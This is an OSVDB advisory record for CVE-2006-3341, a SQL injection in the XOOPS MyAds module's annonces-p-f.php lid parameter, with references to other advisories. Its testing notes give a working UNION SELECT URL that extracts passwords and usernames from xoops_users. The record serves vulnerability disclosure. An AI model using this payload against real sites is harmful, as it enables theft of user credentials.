XOOPS MyAds Module annonces-p-f.php lid Variable SQL Injection

2006-06-28T07:18:59
ID OSVDB:26905
Type osvdb
Reporter OSVDB
Modified 2006-06-28T07:18:59

Description

Manual Testing Notes

http://[target]/modules/myAds/annonces-p-f.php?op=ImprAnn&lid=-1+union+select+1,pass,uid,uname,5,6,7,8,9,10,11,12,13+from+xoops_users+limit+1,1/*

References:

Vendor URL: http://www.xoops.org/ Secunia Advisory ID:20882 ISS X-Force ID: 27455 Generic Exploit URL: http://milw0rm.com/exploits/1961 FrSIRT Advisory: ADV-2006-2591 CVE-2006-3341 Bugtraq ID: 18718